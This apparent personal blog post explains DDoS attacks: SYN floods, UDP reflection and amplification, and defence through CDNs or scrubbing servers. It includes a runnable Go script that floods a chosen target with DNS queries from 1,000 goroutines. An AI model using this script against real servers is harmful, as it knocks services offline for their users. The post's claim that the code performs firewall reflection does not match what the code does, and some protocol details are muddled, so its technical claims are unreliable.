banner
QiYiming‘s Blog

QiYiming‘s Blog

a simple blog by QiYiming#6898
HomeArchivesAboutNFT

Popular Science: What is DDOS? What are the types of DDOS? How can I launch a DDOS attack? And how can I prevent it?

#DDOS#DOS#Attack#Network62
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
DDoS (Distributed Denial of Service) attack is a common method of network attack on the internet. It aims to exhaust server resources by sending a large number of requests, causing normal requests to be unresponsive. When hackers use two or more computers (referred to as "zombies") to send denial of service attacks to a server, it is called a distributed denial attack. DDoS attacks can occur at the transport layer (fourth layer) or application layer (seventh layer) of the OSI network model. TCP and UDP are the protocols commonly used for DDoS attacks. SYN attack is a type of DDoS attack that exploits the three-way handshake process of TCP. UDP attacks include reflection attacks and amplification attacks. DDoS attacks are illegal, and there are two main methods to prevent them: using CDN (Content Delivery Network) or purchasing high-defense servers. However, DDoS attacks can still occur regardless of server quality or defense measures.

What is a DDOS attack#

DDOS, Distributed denial of service attack, is the most common method of network attack on the Internet. Its purpose is to exhaust server resources by sending a large number of requests, causing normal requests to be unresponsive. When a hacker uses two or more computers (commonly known as zombies) to send denial of service attacks to a server, it is called a distributed denial of service attack.

What types of DDOS attacks are there#

To understand the principle of DDOS attacks, we need to understand the OSI network seven-layer model, which divides the data flow in the communication system into seven layers, from the highest layer representing distributed application data to the physical implementation of data transmission across communication media. Each intermediate layer provides functionality to its upper layer, and its own functionality is provided by its lower layer. The categories of functionality are implemented in software through standard communication protocols.

The seven layers of the OSI seven-layer model are#

  1. Physical layer
    In simple terms, it converts (modulates) the bit stream provided by the data link layer into a stable signal suitable for different media and sends it.
  2. Data link layer
    Combines the incoming bits into bytes and then converts them into frames, adding frame headers and frame tails.
  3. Network layer
    Performs logical addressing and implements path selection between different networks, adding network headers to data packets. The header contains network data, such as: IP.
  4. Transport layer
    Adds transport headers to the data to form packets. The transport header contains information about the protocol used for transmission, such as: Transmission Control Protocol (TCP), etc.
  5. Session layer
    The session layer needs to control and maintain the communication link between two computers.
  6. Presentation layer
    The presentation layer converts the data into a format compatible with the recipient and suitable for transmission.
  7. Application layer
    The application layer is a specialized interface designed for applications to set up communication between applications, such as: HTTPS, HTTP, SSH, POP3, FTP.

Distributed denial of service attacks generally exist at the fourth and seventh layers, namely the transport layer and the application layer.
The attack methods of the transport layer are different from those of the application layer. The transport layer has TCP protocol and UDP protocol.
As we all know, TCP requires a three-way handshake to establish a connection, as shown in the figure

image

For simplicity, we can compare the user to Bob and the server to Alice, and Bob is in room 114, while Alice is in room 514.
During the first handshake, Bob sends "Hello Alice, I'm Bob, I'm in room 114." (sends SYN packet)
At the same time, Alice receives Bob's request and performs the second handshake.
During the second handshake, Alice sends "Hello Bob! I'm in room 514." (sends SYN+ACK packet)
Then the third handshake, Bob sends "Okay, let's start transmitting data." (sends ACK packet)
Then Bob and Alice start transmitting data.

But in the real network environment, after Alice replies to Bob, Bob may not receive it for various reasons, so he cannot reply to Alice. When Alice does not receive a reply from Bob within a certain period of time, she will resend the syn+ack packet to Bob. Attackers take advantage of this characteristic and can use many computers to send "Hello Alice, I'm xxx, I'm in xxx room." to the server multiple times, and then Alice will consume a lot of resources to reply to these syn packets, and then crash due to insufficient resources. This is a SYN attack.

So what is a UDP attack?
UDP also has many types of attacks, such as the more common reflection attack.
Using Alice and Bob as examples again, but adding another person, Beast, in room 191.
Bob sends "Hello Alice, I'm Beast, I'm in room 191." to Alice (NTP Request)
But Alice does not reply to Bob, but "Hello Beast, I'm in room 514." (NTP Response)
At this time, Beast will receive the data packet from Alice, but he has no clue about this data packet, so he can't do anything.
UDP also has UDP amplification attacks.
For example, when you search "DDOS" on Baidu, it will return you several tens of KB of data, and this KB divided by the size of the word you searched is the amplification factor.
Bob sends "Hello Alice, I'm Beast, I'm in room 191, what does DDOS mean?" to Alice (NTP Request)
But Alice does not reply to Bob, but "Hello Beast, DDOS refers to distributed denial of service attack..." (NTP Response)
At this time, Beast will receive a larger data packet, and when Bob uses multiple computers as reflection servers and sends requests multiple times, Beast will crash due to the large amount of data.

How to launch a DDoS attack?#

Warning! Any DDoS attack is illegal. If you use the code from this blog to attack any server, this blog is not responsible for any consequences. The example code is for educational purposes only!
Here is an example code that uses the Chinese national firewall as a reflection source:

package main
// Import necessary dependencies
import (
	"fmt"
	"github.com/miekg/dns"
	"github.com/spf13/viper"
	"net"
)

const numGoroutines = 1000 // Set the number of goroutines to be used

func main() {
	// Read the configuration file
	viper.SetConfigName("config") // The configuration file name is config.yaml
	viper.AddConfigPath(".")      // Look for the configuration file in the current directory
	err := viper.ReadInConfig()   // Read the configuration file
	if err != nil {
		panic(err)
	}

	// Create a UDP connection
	conn, err := net.Dial("udp", fmt.Sprintf("%s:%d", viper.GetString("server.ip"), viper.GetInt("server.port")))
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Create a DNS query message
	msg := &dns.Msg{}
	msg.SetQuestion("www.google.com.", dns.TypeA)
	msg.SetQuestion("www.google.com.", dns.TypeAAAA)

	// Create multiple goroutines
	for i := 0; i < numGoroutines; i++ {
		go func() {
			for {
				// Send DNS requests to the specified IP and port
				packed, err := msg.Pack()
				if err != nil {
					panic(err)
				}
				if _, err := conn.Write(packed); err != nil {
					panic(err)
				}
			}
		}()
	}
}

The above is a simple example of a DNS attack that uses the Chinese national firewall as a reflection source, using the Go programming language.

How to prevent DDoS attacks?#

There is no way to prevent DDoS attacks, currently there are two main methods

Use CDN#

Using this solution requires hiding your source server IP. The advantage of this solution is that it is distributed and the principle is relatively easy to understand. No matter how the attacker attacks, they can only attack your CDN and cannot reach your server.

Purchase high-defense servers#

Using this solution does not require hiding your source server IP. The advantage of this solution is that the defense can be very large, and there is no need to maintain a CDN. The disadvantage is obvious, it is expensive, expensive, damn expensive. Why is it expensive? For example, a server with 60Gbps defense requires an upstream bandwidth greater than 60Gbps, otherwise your server will be blocked before it is cleaned. High-defense servers are divided into cleaning servers and your servers. They are connected through an internal network. The principle is also very simple.
We call the cleaning server Rick and your server Alice, and the attacker Bob.
When Bob sends a SYN request to your server, the cleaning server will receive this request first and reply with a SYN+ACK to detect whether the user is a SYN attacker. If the user replies with an ACK packet, the cleaning server and your server establish a TCP connection and start forwarding Bob's data.
When Bob is an attacker, he will continuously send SYN packets to the cleaning server, and the cleaning server will start to reply with SYN+ACK, but Bob is not a legitimate user, just a SYN attacker, and will not reply with an ACK packet, so the cleaning server will not forward the attacker's connection to your server.

Summary#

Although DDoS attacks are illegal, they still exist. No matter how good your server is, how cleverly configured, and how powerful the defense is, there will always be more powerful people who will maliciously or non-maliciously attack your server. Liu Cixin said in "The Three-Body Problem": "No matter how fast you are, there is always someone faster than you, no matter how slow you are, there is always someone slower than you." This article is based on my previous experience of being attacked and is published. If there are any omissions in the content, welcome to discuss in the comments. If there are any errors in the content, please point them out.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.